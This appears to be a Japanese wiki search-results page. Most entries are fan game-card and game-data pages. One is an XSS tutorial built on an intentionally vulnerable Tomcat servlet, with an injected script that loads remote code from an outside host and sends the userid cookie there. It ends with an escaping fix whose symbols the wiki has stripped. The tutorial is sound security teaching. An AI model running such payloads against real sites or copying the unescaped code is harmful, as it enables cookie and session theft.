約 3,981,245 件
https://w.atwiki.jp/magicman/pages/14701.html
アポカリプティック・サウンド・ドラゴン P 火文明 (7) クリーチャー:アーマード・ドラゴン 13000+ パワーアタッカー+4000 T・ブレイカー 自分はカードを引くことができない。 作者:808 わかりやすいデメリット付き高パワードラゴン。 何にでも最後にドラゴンとつければ大抵それっぽくなるドラゴン。 カードリスト:808 フレーバーテキスト 狂気にも似た激情が、周囲を巻き込んで増大していく。 評価 名前 コメント
https://w.atwiki.jp/puzzlederby/pages/162.html
トリプティク リヴァーマン?☆4または☆5 ガチャ アロンダイト?☆3 衝撃のプロローグ 有馬記念 などで☆1がドロップ復活パワフルマイラー マイルチャンピオンシップ 06 などで☆2がドロップ レファレンスポイント☆4 レファレンスポイント降臨 ムトト?☆3 転生 ムトト ナリタタイシン☆4 転生 ナリタタイシンダービー☆ロマン 弥生賞 93 芦毛伝説の後継者 菊花賞 93 などで☆3がドロップ
https://w.atwiki.jp/magicman/pages/36273.html
断罪執行者 アポカリプティック・エクスキューション KGM ゼロ 666 エクスキューショナークリーチャー 66666666 ■アポカリプティック・ブレイカー(このクリーチャーはこのクリーチャーは、相手のシールドをすべてブレイクし、その攻撃の後、自分のシールドをすべてブレイクする。各ブレイクの前に、相手のクリーチャーを1体破壊する。) ■自分の手札に加えるシールドカードはすべてに「S・トリガー」を与える。 ■このクリーチャーが執行者降臨した時、相手のシールドを一つ選ぶ。そうしたら相手の手札と墓地にあるカードをすべてそのシールドの下に置き、こうして選んだシールドに含まれるカードが持つS・トリガーをこのゲーム中無視する。 ■相手のクリーチャーすべてのバトルゾーンを離れなくする能力を無視する。 ■このクリーチャーがバトルゾーンを離れる時かわりにこのクリーチャーのアポカリプス・セルを一枚墓地に置く。その後自分のマナゾーンと手札にあるカードを一枚山札の一番下に置く。 ■このカードがバトルゾーン以外のゾーンにあればバトルゾーンにあるカードをすべて破壊し、自分はゲームに負ける。 執行者降臨前:《滅亡の聖典》、《終焉の黙示》、《円環の黙示》、《執行の黙示》、《激昂の黙示》 ※殿堂入り 作者:メンチカツ 米 気まぐれで考えたラスボスっぽいやつです。 フリーで使用可能にしますんでご自由にお使いください。 評価 名前 コメント
https://w.atwiki.jp/magicman/pages/34949.html
終末の爆弾(ボムズ・エンドロール) アポカリプティック・カウント SR 闇 (3) D2フィールド: ■どこからでもカードが墓地に置かれる時、かわりにそのカードをこのD2フィールドの下に重ねてもよい。 ■このD2フィールドはコスト5以下のカードの効果によってバトルゾーンを離れない。 ■Dスイッチ:このD2フィールドの下にあるカードが15枚になった時、このD2フィールドをゲーム中で上下逆さまにしてもよい。そうしたら、各プレイヤーは自分のバトルゾーン、墓地、シールドゾーン、マナゾーン、手札にあるカードをすべて山札に加え、シャッフルする。 カードの強さ 選択肢 投票 ✴︎ぶっ壊れ (0) ◎即戦力 (0) ◯有能 (0) △並 (0) ×環境外 (0) カードのデザイン 選択肢 投票 ★★★★★ (0) ★★★★☆ (0) ★★★☆☆ (0) ★★☆☆☆ (0) ★☆☆☆☆ (1) コメント何でも。 名前 コメント
https://w.atwiki.jp/ddobibouroku/pages/25.html
スクロール・オブ・ディスペル・マジック(Lv3) -- (名無しさん) 2006-08-24 12 54 01 スクロール・オブ・ディスペル・マジック(Lv3) -- (名無しさん) 2006-08-25 21 30 02 スクロール・オブ・ヒロイズム(Lv3) -- (名無しさん) 2006-08-25 21 30 24 スクロール・オブ・ウォーター・ブリージング -- (名無しさん) 2006-09-01 00 08 33
https://w.atwiki.jp/hangeme_petit/pages/55.html
プティとは 編集 ゲーム紹介 タイトル ハンゲームペット プティ ジャンル ペット育成&アバター 動作環境 Microsoft Windows および Internet Explorer 7.0 / 8.0Adobe Flash Player サービス開始日 2010.12.7 開発・運営 NHN Japan株式会社 利用料金 基本プレイ無料,一部課金(ハンコイン)アイテムあり 備考 1アカウントにつき1匹 コピーライト (C)2010. NHN Japan Corporation. All Rights Reserved. 公式紹介 ・いつも一緒でうれしい! ハンゲーム マイページで飼うかわいいペット! いつでもあなたと一緒だよ♪ ・お世話してなかよく! プティにごはんをあげたり、おもちゃであそんであげたりすると とってもよろこんで、プティレベルが上がるんだ。 ・おしゃれしてかわいい! プティはとってもおしゃれなの! ファッションだけじゃなくて、みみやしっぽも自由につけかえできるんだよ♪ 通貨 プティ内のアイテム購入に必要な通貨 通貨名 価格 入手方法 ハッピーメダル 無料 ハッピーメダルを参照 ハンコイン 1円=ハンコイン1円 ハンゲーム→ハンコインを参照 プティの表示設定 マイページのプロフィールページ・マイニュースページにあるプティの部屋ボタンをクリック。(2011/07/22~) ハンゲームお知らせ / 公式サークルのニュース + 旧仕様 (~2011/07/22) ※現在一度プティを飼い始めるとやめることができません。 お世話をしなくなって病気のプティを見せたくない、見たくない方は表示設定を変更してください。 2010/12/15からプロフィールページの初期表示設定が「ペット」に変更になっています。 変更方法 マイページ>プロフィールページの「○○さんのおうち」というバーにある「設定」ボタンまたはすべての設定>設定メニュー>・マイホーム/マイエリア設定 初期表示設定 ペット / マイホーム / マイエリア※表示させたくないときはペット以外に。 ペット公開設定 友達まで公開 / 全ての人に公開 / 公開しない※表示させたくないときは公開しないに。 ※この変更後、自分でペットのリンクをクリックしたときだけ、プティを見ることが出来ます。 公式解説 ハンゲームQ&A / 公式サークルのよくある質問 コミュニケーション ルームの右下の「ともだち」アイコンから、フォローしあっている友達の一覧が見れます。 ともだちクリックでペットを見に行けます。 アバターの下のアイコンについて 表示無し プティを飼っていない ふきだしにハート 24時間以内になでてくれた ふきだしに× プティを非公開 ともだちがなでてくれたのは確認できるが、友達では無い人がなでてくれた履歴は確認できません。(2011.3.19現在) 他人のプティ画面でファッションアイテムをプレゼントすることができます。 たからもの交換アイテムはプレゼントできません。 ガチャアイテムはプレゼントできません。
https://w.atwiki.jp/bokuserve/pages/3173.html
【元ネタ】史実、聖人伝 【CLASS】シールダー 【マスター】 【真名】イスティッド 【性別】男性 【身長・体重】168cm・63kg 【属性】秩序・善 【ステータス】筋力C 耐久B 敏捷C 魔力B 幸運C 宝具C 【クラス別スキル】 対魔力:A Aランク以下の魔術を無効化する。 教会の秘蹟には対応しない。 騎乗:C 正しい調教、調整がなされたものであれば万全に乗りこなせる。 自陣防御:C 味方、ないし味方の陣営を守護する際に発揮される力。 防御限界値以上のダメージ削減を発揮するが、自分はその対象には含まれない。 【保有スキル】 奇蹟:D 時に不可能を可能とする奇蹟。 治癒や豊穣、メールキヨン王との対立にまつわる奇蹟が知られる。 信仰の加護:A 一つの宗教観に殉じた者のみが持つスキル。 加護とはいうが、最高存在からの恩恵はない。 あるのは信心から生まれる、自己の精神・肉体の絶対性のみである。 陣地作成:C+ 自動的に拡大していく“聖域”を形成できる。 弟子である後の聖ギルダスが「小さく不毛な島を広く肥沃にしてくれ」と言った時、 これに応えた祈りはスランイルティッドの地を拡大し豊かな土地に変えたという。 【宝具】 『今に続く学び舎の礎(スラン・イスティッド・ヴァウル)』 ランク:C 種別:結界宝具 レンジ:2~40 最大捕捉:300人 サムソンが彼の魂に捧げた十字架とデイヴィッドが贈った鐘を核とし、 イスティッドの信心に比例した強度の守りを持つ修道院を顕現させる。 城砦ならざる修道院の“比例定数”はロード・キャメロットのそれには及ばない。 【Weapon】 『トレニヒド』 別れた妻の名を冠した剣。 戦士、騎士としての戦いを行う際には敢えてこの名を掲げて赴く。 【解説】 六世紀のウェールズで活躍したとされる、ブルターニュ出身の聖人。 ウェールズ伝承や聖人伝ではアルスル(アーサー)の母方の従兄弟として伝えられる。 若い頃は戦士、騎士であったとされ、ギャラハッドの原型ではないかとも言われ、 ヨロ・モルガヌグの三題詩は彼を『アルスル宮廷の聖杯を守護する三騎士』に挙げる。 ギャラハッドの聖杯探求を最初に書いた作品、その作者とされた(これは嘘なのだが) ウォルター・マップは、イスティッドと聖カドックのエピソードを書き残してもいる。 両親はイスティッドが教会人として生きる事を望み、聖人のもとへ行かせ学ばせた。 彼は全ブリトン人の中で最も学問に精通し、予言の天恵も有していたと評判になり、 特に文学においては傑出していたのだが、やがてこの道を外れて戦士を志した。 彼はブリテンに渡って高名な従兄弟アーサーの、次にグラモーガンの王に仕える。 いずれにおいても彼は高い実力を見せ、地位を築き、美しい妻をも得ていたのだが ある時同輩らが聖カドックに暴虐を働き、応報の天罰が起こったのを見て恐怖する。 彼はカドックに恭順し「宗教人に戻って残りの生涯を神に尽くせ」との助言を得る。 王夫妻に惜しまれつつ暇乞いをし、更に天使から「一時的なものを愛する事を止め、 永遠の神のみを愛せ」と啓示を受けると妻をも捨て、やがて立派な聖職者になった。 イスティッドが設立したスランイルティッド・ヴァウルの修道院は ウェールズにおける最初の大修道院であり、布教と勉学の拠点ともなった。 聖デイヴィッド、聖パウロ・オウレリアン、聖ギルダス、聖サムソン等々 多くの者がこの修道院でイスティッドに学んだ、と信じられている。 イスティッドは六世紀半ばに亡くなり、自ら開いた修道院に葬られた。 祝祭日は11月6日。スランイルティッド・ヴァウルにある十字架の碑文には 『サムソンがイスティッドらの魂の為にこの十字架を置いた』と記されている。
https://w.atwiki.jp/hangeme_petit/pages/35.html
プティガチャ 期間限定アイテムが手に入るプティ用のガチャ。 ダブりあり。 プレゼント不可。 リサイクル可。(2011/02/17~) リサイクル価格200枚。(2011/04/22~) 料金 1回 ハンコイン 200円 ハッピーメダル 3000枚 開催 過去のプティガチャ 編集 + 第5期 2011.05.27~2011.7.7 正午頃 「プティガチャ×チョコットランド!」 第5期 2011.05.27~2011.7.7 正午頃 「プティガチャ×チョコットランド!」 アイテム詳細求む アイテム名 説明 レア 部位 画像 #ref error :画像URLまたは、画像ファイル名を指定してください。 キャンペーン ハンコイン購入 アイテム名 画像 5回 モリッコおめめ 10回 モリッコメイジ アイテムの配布は7月中 + 第4期 2011.4.21~2011.05.27 正午頃 「プティの国のお姫さま」 第4期 2011.4.21~2011.05.27 正午頃 「プティの国のお姫さま」 アイテム詳細求む アイテム名 説明 レア 部位 画像 #ref error :画像URLまたは、画像ファイル名を指定してください。 + 第3期 2011.3.25~2011.4.21 「ようこそ!プティ学園」 第3弾 (2011.3.25~2011.4.21) ようこそ!プティ学園 アイテム名 説明 レア 部位 画像 かんげき なみだあふれる目 め ニヒル 楽しそうなニヤニヤ口 くち 男の勲章 誇らしい気持ちになれる もよう リーゼント お風呂でもくずれない ☆ ぼうし 満開サクラ かぶるとどこでもお花見 ぼうし 夜露死苦学ラン イキがってみたくなる制服 ☆ トップス お花見サロペ お団子が入るポケットつき トップス 愛羅武勇セーラー 悪ぶってみたくなる制服 ☆ トップス 1年生ジャージ 青春の香りがするジャージ トップス おもちゃの木刀 たたいてもいたくない 雑貨 プティーナ学園かばん 憧れのあの学園のかばん 雑貨 みずいろぐみ制服 なつかしい幼稚園の制服 セット キャンペーン ボーナスアイテム増量 2011/3/25~4/11(正午頃まで) アイテム名 説明 部位 画像 プティーナ学園ベスト 憧れのあの学園のベスト アウター プティーナ学園ベレー 憧れのあの学園の帽子 ぼうし 卒業証書 中には思い出がつまってる 雑貨 2011/4/11~4/21 アイテム名 説明 部位 画像 プティーナ学園男子制服 トップス プティーナ学園女子制服 トップス プティーナ学園部室 部屋テーマ + 第2期 2011.2.17~2011.3.17 「やんちゃ★パンクロック」 第2期 (2011.2.17~2011.3.17) やんちゃ★パンクロック アイテム名 説明 レア 部位 画像 ドクロチャンパッチ キュートなドクロの眼帯 ☆ パンキッシュ★ハット 元気なボーダーのぼうし ピンキーチェックリボン キュートなもようのリボン わるいこマスク たまにはグレてみたい ☆ ピンキーチェックワンピ キュートなもようのワンピ ☆ パンキッシュ★トップ 元気なボーダーのシャツ らびらびパーカー うさみみつきのパーカー わるいこボーダー たまには悪ぶってみたい ☆ ジェイルロック パンクなスタイルの首輪 ブラッディクラウン かぶるとエライ人の気分に ピンキーチェックスカート キュートなもようのスカート チュールロック ふわふわカワイイスカート チェッカーストール クールなもようのストール ともだちクマチャン パンクにキメたぬいぐるみ プティーズビート! ジャカジャカジャーン! ☆ キャンペーン ハンコインでガチャを購入すると、限定アイテムプレゼント。 ハンコイン購入(回) アイテム 説明 1 シュートスター サロンアイテム 4 パンクラビットカー おもちゃアイテム 10 ピンキーロック 部屋テーマアイテム 告知ページでアイテム受け取り + 第1期 2011.1.25~2011.2.17 「バレンタインwith you」 第1期 2011.1.25~2011.2.17 「バレンタインwith you」 アイテム詳細求む アイテム名 説明 レア 部位 画像 #ref error :画像URLまたは、画像ファイル名を指定してください。 キャンペーン 1/25~2/1 ハッピーメダル価格3000枚→2000枚に値下げ。 情報提供 プティーナ学園女子制服と同じく男子の制服の画像間違ってません?見た目的に逆だと思うんですけど、、違ってたらごめんなさい。 -- (無名の心) 2011-03-27 23 21 03 修正 -- (名無しさん) 2011-03-28 04 10 13 プティーナ学園ベスト「憧れのあの学園のベスト」 プティーナ学園ベレー 「憧れのあの学園の帽子」 新ガチャのページ作りはしてないのですか? -- (名無しさん) 2011-05-18 21 46 28 名前 コメント すべてのコメントを見る
https://w.atwiki.jp/talesofrebirth/pages/88.html
28/169 ガレプティック 種族 植物 Lv 43 HP 9521 Gald 448 Exp 392 斬撃 打撃 術撃 攻撃力 1042 625 312 防御力 154 373 258 アイテム パナシーアボトル 11% リカバーオニキス 3% 防御行動 特定攻撃前 弱点 鋼体 半減 防御 属性 地 水 風 - 出現場所 ウォンティガの聖殿 マオ評価 食虫植物ウツボカズラのバイラス。 怒ると相手を捕まえて食べようとするんだ。 僕は虫じゃないヨ!
https://w.atwiki.jp/chapati4it/pages/504.html
Tomcatでクロスサイトスクリプティングの脆弱性があるアプリを作成して、クロスサイトスクリプティングを体験、それからクロスサイトスクリプティング対策を実施するサンプルです。 ■目次 まずは脆弱性のあるサンプルソース サンプルの説明 ダメなところ クロスサイトスクリプティングをやってみよう1 クロスサイトスクリプティングをやってみよう2 クロスサイトスクリプティング対策をしてみよう その他のクロスサイトスクリプティング対策 まずは脆弱性のあるサンプルソース xss.jsp %@ page language="java" contentType="text/html; charset=UTF8" pageEncoding="UTF-8" % html head title Xssサンプル /title meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /head body 名前: %= request.getAttribute("name") % br 内容: %= request.getAttribute("content") % hr form action= %=request.getContextPath()+"/xss"% method= GET お名前: input type="text" name="name" value= br 内容: textarea name="content" /textarea br /form /body /html Xss.java import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class Xss extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // JSPに渡すパラメータ req.setAttribute("name", ""); req.setAttribute("content", ""); // クッキー設定 resp.addCookie(new Cookie("userid", "hogehoge")); resp.addCookie(new Cookie("xss", "sample")); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); if (name == null) name = ""; String content = req.getParameter("content"); if (content == null) content = ""; content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } } web.xml ?xml version="1.0" encoding="ISO-8859-1"? web-app xmlns="http //java.sun.com/xml/ns/javaee" xmlns xsi="http //www.w3.org/2001/XMLSchema-instance" xsi schemaLocation="http //java.sun.com/xml/ns/javaee http //java.sun.com/xml/ns/javaee/web-app_3_0.xsd" version="3.0" servlet servlet-name xss /servlet-name servlet-class Xss /servlet-class /servlet servlet-mapping servlet-name xss /servlet-name url-pattern /xss /url-pattern /servlet-mapping /web-app サンプルの説明 なんの変哲もない、画面からの入力をまた画面に表示する「掲示板もどき」なサンプルです。 /xxx にアクセス(GET)するとクッキーに userid を設定します。クッキーに userid が残っていればログイン中という判断 userid のルールはアルファベットの大文字小文字と 0 から 9 の数字とする。 名前と内容を入力して送信(POST)すると名前と内容をJSPに表示します。 このサンプルを普通に使うと以下のようになります。 ※submitボタンを省略しているので、名前のテキストボックスでエンターを押すとフォームの内容が送信されます。 Before ↓ After ダメなところ このサンプルの良くないところは、以下のパラメータを処理してJSPに渡す部分です。 // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); if (name == null) name = ""; String content = req.getParameter("content"); if (content == null) content = ""; content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); 教科書的に言えば、ここでパラメータの文字列から「 」「 」「 」「"」「 」の5種類をサニタイジングする必要があります。 ですが、今回のサンプルはまず脆弱性の体験が目的なのでサニタイジングは省略しています。 ※厳密に言うと、クッキーに保存した userid でログインしていると判断するのも危険ですが今回は無視してください。 クロスサイトスクリプティングをやってみよう1 まずは以下のように内容に「 script alert(document.cookie) /script 」と入力してみましょう。このスクリプトは、クッキーの内容をダイアログに表示するスクリプトです。 ↓ はい、サニタイジングしてないので見事にスクリプトが動作してクッキーの内容が表示されました。 ※クッキーはローカルに保存されるので、このようなスクリプトを使わなくても確認できます。 内容から、 userid がログインに使うIDだとわかるので、これを盗むスクリプトを動作させてみましょう。 クロスサイトスクリプティングをやってみよう2 次は以下のスクリプトを打ち込んでフォームを送信しましょう。 script var tag = document.createElement("script");tag.setAttribute("src","http //www46.atpages.jp/chapati/xss/sample1.js");document.getElementsByTagName("body").item(0).appendChild(tag); /script 以下のようなダイアログが表示されればXSS攻撃成功です。 上記のスクリプトは、攻撃者が用意したスクリプト「http //www46.atpages.jp/chapati/xss/sample1.js」を実行させるものです。 http //www46.atpages.jp/chapati/xss/sample1.jsの中身は以下のようになっています。 // クッキーからログインIDを抜き出す var userid = document.cookie.match(/userid=[a-zA-Z0-9]+/).toString().substring(7); // 攻撃サイトのURLにログインIDを追加し攻撃URLを作成 var url = "http //www46.atpages.jp/chapati/xss/" + userid; // スクリプトタグを作成 var tag = document.createElement("script"); // src属性に攻撃URLを設定 tag.setAttribute("src",url); // bodyタグにスクリプトタグを追加 document.getElementsByTagName("body").item(0).appendChild(tag); このスクリプトは、コメントにもあるとおり、クッキーからログインIDを抜き出し、ログインIDをURLに追加して攻撃者の用意したサイトにアクセスさせます。 今回のサンプルでは、ログインIDは「hogehoge」なので、「http //www46.atpages.jp/chapati/xss/hogehoge」にアクセスが発生すれば、攻撃者はURLからログインIDを取得できてしまいます。 ※今回は「XSS攻撃成功!」と表示するスクリプトを埋め込んでいますが、実際に攻撃されたときはそんなダイアログはでません。 クロスサイトスクリプティングの脆弱性があると、悪意のある javascript をいとも簡単に実行できることがお分かりいただけたでしょうか? 今回はクッキーの情報を盗むスクリプトですが、javsscriptを自由に実行されるとHTMLの中に書いてある情報全てを好きなだけ盗むことが可能になります。利用者の個人情報が表示されたページに、悪意のあるスクリプトを埋め込まれれば、もちろん個人情報だって盗めてしまうのです。 クロスサイトスクリプティング対策をしてみよう 今回のサンプルの脆弱性は、入力された文字をサニタイジングしないで表示していることです。ですから、サニタイジングを実施すればクロスサイトスクリプティング攻撃は成功しなくなります。 以下のソースコードが、サニタイジングを実施したサンプルです。 Xss.java(対策後) import java.io.*; import javax.servlet.*; import javax.servlet.http.*; public class Xss extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // JSPに渡すパラメータ req.setAttribute("name", ""); req.setAttribute("content", ""); // クッキー設定 resp.addCookie(new Cookie("userid", "hogehoge")); resp.addCookie(new Cookie("xss", "sample")); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { // パラメータを処理 req.setCharacterEncoding("UTF-8"); String name = req.getParameter("name"); // if (name == null) name = ""; name = escapeHTML(name);// ★★★ 修正点 ★★★ String content = req.getParameter("content"); // if (content == null) content = ""; content = escapeHTML(content);// ★★★ 修正点 ★★★ content = content.replaceAll("\n", " br "); // JSPに渡す req.setAttribute("name", name); req.setAttribute("content", content); RequestDispatcher disp = req.getRequestDispatcher("/jsp/xss.jsp"); disp.forward(req, resp); } //★★★ 修正点 ★★★ public static String escapeHTML(String val) { if (val == null) return ""; val = val.replaceAll(" ", " amp;"); val = val.replaceAll(" ", " lt;"); val = val.replaceAll(" ", " gt;"); val = val.replaceAll("\"", " quot;"); val = val.replaceAll(" ", " apos;"); return val; } } 修正点は「 」「 」「 」「"」「 」をそれぞれ「 lt;」「 gt;」「 amp;」「"」「'」に変換する関数「escapeHTML」を追加したのと、「name」「content」パラメータを escapeHTML でサニタイジングしていることです。※wikiの表示の都合で の後に半角スペース入れています。 この修正を加えたサンプルで、再びスクリプトを入力してみると以下のような画面になります。 スクリプトが実行されず、そのまま画面に表示されていれば、クロスサイトスクリプティング対策成功です。 その他のクロスサイトスクリプティング対策 クロスサイトスクリプティングの対策には、大雑把に以下の様なものがあります。今回対策したのは、この中の「ウェブページに出力する全ての要素に対して、エスケープ処理を施す。」に過ぎません。他の対策については折をみて記事を追加していこうと思います。 HTMLテキストの入力を許可しない場合の対策ウェブページに出力する全ての要素に対して、エスケープ処理を施す。 URLを出力するときは、「http //」や「https //」で始まるURLのみを許可する。 script ... /script 要素の内容を動的に生成しない。 スタイルシートを任意のサイトから取り込めるようにしない。 入力値の内容チェックを行う。 HTMLテキストの入力を許可する場合の対策入力されたHTMLテキストから構文解析木を作成し、スクリプトを含まない必要な要素のみを抽出する。 入力されたHTMLテキストから、スクリプトに該当する文字列を排除する。 全てのウェブアプリケーションに共通の対策HTTPレスポンスヘッダのContent-Typeフィールドに文字コード(charset)を指定する。 Cookie情報の漏えい対策として、発行するCookieにHttpOnly属性を加え、TRACEメソッドを無効化する。 ※参考 IPA 安全なウェブサイトの作り方(PDF)